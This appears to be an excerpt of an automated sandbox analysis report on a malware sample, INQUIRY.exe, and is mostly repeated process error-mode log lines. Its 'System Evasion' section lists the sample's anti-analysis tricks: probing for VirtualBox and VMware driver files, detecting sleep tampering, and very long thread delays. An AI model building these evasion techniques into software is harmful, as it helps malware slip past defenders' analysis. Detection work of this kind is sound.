                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Contains functionality to detect sleep reduction / modificationsShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99750s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98797s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97406s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97297s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476Thread sleep count: 213 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99812s >= -30000s
